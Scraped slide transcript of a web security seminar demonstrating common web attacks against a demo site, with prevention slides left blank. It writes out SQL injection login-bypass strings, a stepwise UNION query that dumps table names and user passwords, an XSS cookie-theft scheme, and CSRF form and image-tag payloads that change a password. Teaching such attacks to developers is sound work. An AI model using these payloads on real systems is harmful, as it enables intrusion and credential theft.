Download presentation
Presentation is loading. Please wait.
1
Web Security Seminar Simon Perry, Managing Director
2
What are we going to do today?
4
The Tour!
5
…aspx?id=16
6
IDFirst NameLast NameEmailFilename 1JohnSmithjs@email.com1.rtf 2BillJonesbill@gmail.com2.doc 3JanePerryjane@hotmail.com3.doc 4JillKempjill@email.com4.pdf 5DaveSmithersdave@davesmithers.com 6BobJonesbob.jobs@gmail.com6.doc
7
Prevention …aspx?id=16&t=H6Q98BN
8
File Include Attacks /content.aspx?c=skinCare.html /content.aspx?c=babies.html
10
Prevention
11
Username: Password:
12
Username: username Password: ….. WHERE user = 'username' …
13
Username: user'name Password: ….. WHERE user = 'user'name' …
14
Username: myusername Password: mypassword GET THE USER WHERE username = 'myusername' AND password='mypassword'
15
Username: ' or 'a' = 'a Password: ' or 'a' = 'a GET THE USER WHERE username = '………' AND password='……….'
16
Username: ' or 'a' = 'a Password: ' or 'a' = 'a GET THE USER WHERE username = '' or 'a' = 'a' AND password='' or 'a' = 'a'
17
Username: admin Password: ' or username='admin
18
Username: admin Password: ' or username='admin GET THE USER WHERE username = 'admin' AND password='' or username = 'admin'
19
Prevention
20
…NewsList.aspx?cat=6
21
IDTitleIntro TextCategory 1IFOAM organic principlesOrganic principles………2 2Organic farmingOrganic farming prac……2 3A guide to organic food accreditation The word "organic" is one that ….. 3 4Labelling and packagingOrganic foods must meet EU…. 4 5Organic economicsUK food production has received…. 4 6Organic food - fact vs. fictionSurprisingly, there is opposition to the… 4
22
…NewsList.aspx?cat=6 SELECT * FROM tblNews WHERE category_id=6
23
SELECT * FROM tblNews WHERE category_id=
24
SELECT * FROM tblNews WHERE category_id=4 UNION ALL
25
IDTitleIntro Text 1IFOAM organic principles Organic principles……… 2Organic farmingOrganic farming prac…… 3A guide to organic food accreditation The word "organic" is one that ….. 4Labelling and packaging Organic foods must meet EU…. IDCategory NameDescription 1RedRed items 2BlackBlack items 3GreenGreen items 4BlueBlue items UNION ALL IDTitleIntro Text 1IFOAM organic principles Organic principles……… 2Organic farmingOrganic farming prac…… 3A guide to organic food accreditation The word "organic" is one that ….. 4Labelling and packaging Organic foods must meet EU…. 1RedRed items 2BlackBlack items 3GreenGreen items 4BlueBlue items
26
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL
27
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL IDTitleIntro TextCategory 1IFOAM organic principlesOrganic principles………2 2Organic farmingOrganic farming prac……2 3A guide to organic food accreditation The word "organic" is one that ….. 3 4Labelling and packagingOrganic foods must meet EU…. 4 5Organic economicsUK food production has received…. 4 6Organic food - fact vs. fictionSurprisingly, there is opposition to the… 4
28
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, NULL
29
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL
30
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, 'AAAA', NULL, NULL, NULL, NULL
31
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, 'AAAA', NULL, NULL, NULL, NULL
32
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects
33
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'
34
SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'
35
SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'
36
SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name + CAST(id AS nvarchar), NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'
37
SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM syscolumns WHERE id=357576312
38
SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL,username + '-' + password,NULL,NULL,NULL,NULL FROM tblUsers
39
Prevention
41
File upload attacks
42
Prevention
44
XSS (Cross Site Scripting)
45
The Title Hello
46
Thank you […….].
![Thank you […….].](http://images.slideplayer.com/12/3385981/slides/slide_46.jpg "Thank you […….].")
47
alert("Hello");
48
Cookies Cache-Controlprivate Content-Length11308 Content-Typetext/html; charset=utf-8 ServerMicrosoft-IIS/7.0 X-AspNet-Version2.0.50727 Set-CookieASP.NET_SessionId=k3isz4qw4wl X-Powered-ByASP.NET DateWed, 19 Nov 2008 09:55:21 GMT Hostbadsecurity.corrine.xservers User-AgentMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.4) Accepttext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Languageen-gb,en;q=0.5 Accept-Encodinggzip,deflate Accept-CharsetISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive300 Connectionkeep-alive Refererhttp://badsecurity.corrine.xservers/ CookieASP.NET_SessionId=k3isz4qw4wl Web Server Client
49
XSS Attack Web Server Client
50
Cookie : ASP.NET_SessionId=k3isz4qw4wl XSS Attack Cookie : ASP.NET_SessionId=k3isz4qw4wl Web Server Client Bad Guy’s Web Server
52
Prevention
53
XSRF (Cross Site Request Forgery)
55
New Password: New Password (repeat):
57
Do you like eggs?
58
Do you like eggs? <form target=m action="http://badsecurity.corrine.xservers/MyAccount.aspx" method="post">
59
Do you like eggs? <form target=m action="http://badsecurity.corrine.xservers/MyAccount.aspx" method="post">
60
Do you like eggs?
61
<img src="http://badsecurity.corrine.xservers/MyAccount.aspx?password=x2&password2=x 2" />
62
Prevention
67
Why? Led by Design Training / Experience Price Driven Young Industry
68
Saniti se Input
69
Code Librar ies
70
Saniti se Input Code Librar ies Traini ng
71
Saniti se Input Code Librar ies Traini ng Testin g
72
Saniti se Input Code Librar ies Traini ng Testin g Process
73
be good
74
web application development web penetration testing
Similar presentations
